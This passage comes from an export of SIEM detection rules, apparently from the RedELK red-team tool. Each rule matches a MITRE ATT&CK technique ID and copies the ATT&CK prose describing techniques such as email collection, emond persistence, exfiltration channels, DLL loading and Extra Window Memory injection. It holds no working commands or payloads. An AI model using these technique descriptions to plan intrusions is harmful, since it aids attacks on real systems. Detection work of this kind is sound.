Exchange","id":"T1173"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1114","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1114] Email Collection","query":"threat.technique.id: T1114","references":["https://attack.mitre.org/techniques/T1114"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1114","name":"Email Collection","id":"T1114"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.[1] The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.[2][3][4] This technique may be combined with Masquerading to trick the user into granting escalated privileges to malicious code.[2][3] This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1514","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1514] Elevated Execution with Prompt","query":"threat.technique.id: T1514","references":["https://attack.mitre.org/techniques/T1514","https://attack.mitre.org/techniques/T1548/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1514","name":"Elevated Execution with Prompt","id":"T1514"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the Launch Daemon configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.[1][2][3]\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.[1][2][3] Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the Launch Daemon service.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1519","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1519] Emond","query":"threat.technique.id: T1519","references":["https://attack.mitre.org/techniques/T1519","https://attack.mitre.org/techniques/T1546/014"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1519","name":"Emond","id":"T1519"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1519","name":"Emond","id":"T1519"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes[1] and to support other malicious activities, including distraction[2], hacktivism, and extortion.[3]\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.[4]\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.[5]\nFor attacks attempting to saturate the providing network, see Network Denial of Service.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1499","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1499] Endpoint Denial of Service","query":"threat.technique.id: T1499","references":["https://attack.mitre.org/techniques/T1499"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1499","name":"Endpoint Denial of Service","id":"T1499"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.[1] Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.[2]\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1480","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1480] Execution Guardrails","query":"threat.technique.id: T1480","references":["https://attack.mitre.org/techniques/T1480"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1480","name":"Execution Guardrails","id":"T1480"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.[1][2] These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.[3][4] This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.[5][6][7]\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.[8][9][10][11]\nAdversaries may abuse these native API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1106","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1106] Execution through API","query":"threat.technique.id: T1106","references":["https://attack.mitre.org/techniques/T1106"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1106","name":"Execution through API","id":"T1106"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. [1]\nThe module loader can load DLLs:\nvia specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\nvia EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\nvia an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\nvia <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\nAdversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1129","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1129] Execution through Module Load","query":"threat.technique.id: T1129","references":["https://attack.mitre.org/techniques/T1129"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1129","name":"Execution through Module Load","id":"T1129"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.\nExfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1048","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1048] Exfiltration Over Alternative Protocol","query":"threat.technique.id: T1048","references":["https://attack.mitre.org/techniques/T1048"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1048","name":"Exfiltration Over Alternative Protocol","id":"T1048"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1041","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1041] Exfiltration Over Command and Control Channel","query":"threat.technique.id: T1041","references":["https://attack.mitre.org/techniques/T1041"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1041","name":"Exfiltration Over Command and Control Channel","id":"T1041"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1011","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1011] Exfiltration Over Other Network Medium","query":"threat.technique.id: T1011","references":["https://attack.mitre.org/techniques/T1011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1011","name":"Exfiltration Over Other Network Medium","id":"T1011"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1052","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1052] Exfiltration Over Physical Medium","query":"threat.technique.id: T1052","references":["https://attack.mitre.org/techniques/T1052"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1052","name":"Exfiltration Over Physical Medium","id":"T1052"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)[1], standard services (like SMB[2] or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.[3] Depending on the flaw being exploited this may include Exploitation for Defense Evasion.\nIf an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.[4][5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1190","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1190] Exploit Public-Facing Application","query":"threat.technique.id: T1190","references":["https://attack.mitre.org/techniques/T1190"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1190","name":"Exploit Public-Facing Application","id":"T1190"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\nSeveral types exist:\nBrowser-based Exploitation\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\nOffice Applications\nCommon office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\nCommon Third-party Applications\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1203","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1203] Exploitation for Client Execution","query":"threat.technique.id: T1203","references":["https://attack.mitre.org/techniques/T1203"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1203","name":"Exploitation for Client Execution","id":"T1203"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.[1][2] Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1212","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1212] Exploitation for Credential Access","query":"threat.technique.id: T1212","references":["https://attack.mitre.org/techniques/T1212"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1212","name":"Exploitation for Credential Access","id":"T1212"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1211","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1211] Exploitation for Defense Evasion","query":"threat.technique.id: T1211","references":["https://attack.mitre.org/techniques/T1211"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1211","name":"Exploitation for Defense Evasion","id":"T1211"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1068","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1068] Exploitation for Privilege Escalation","query":"threat.technique.id: T1068","references":["https://attack.mitre.org/techniques/T1068"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1068","name":"Exploitation for Privilege Escalation","id":"T1068"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\nThere are several well-known vulnerabilities that exist in common services such as SMB [1] and RDP [2] as well as applications that may be used within internal networks such as MySQL [3] and web server services. [4]\nDepending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1210","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1210] Exploitation of Remote Services","query":"threat.technique.id: T1210","references":["https://attack.mitre.org/techniques/T1210"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1210","name":"Exploitation of Remote Services","id":"T1210"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.\nAccess to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.[1] Access to remote services may be used as a redundant or persistent access mechanism during an operation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1133","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1133] External Remote Services","query":"threat.technique.id: T1133","references":["https://attack.mitre.org/techniques/T1133"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1133","name":"External Remote Services","id":"T1133"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1133","name":"External Remote Services","id":"T1133"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1008","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1008] Fallback Channels","query":"threat.technique.id: T1008","references":["https://attack.mitre.org/techniques/T1008"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1008","name":"Fallback Channels","id":"T1008"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).[1] Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. [2] [3]\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.[4] More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. [5] [6]\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1181","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1181] Extra Window Memory Injection","query":"threat.technique.id: T1181","references":["https://attack.mitre.org/techniques/T1181","https://attack.mitre.org/techniques/T1055/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1181","name":"Extra Window Memory Injection","id":"T1181"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE 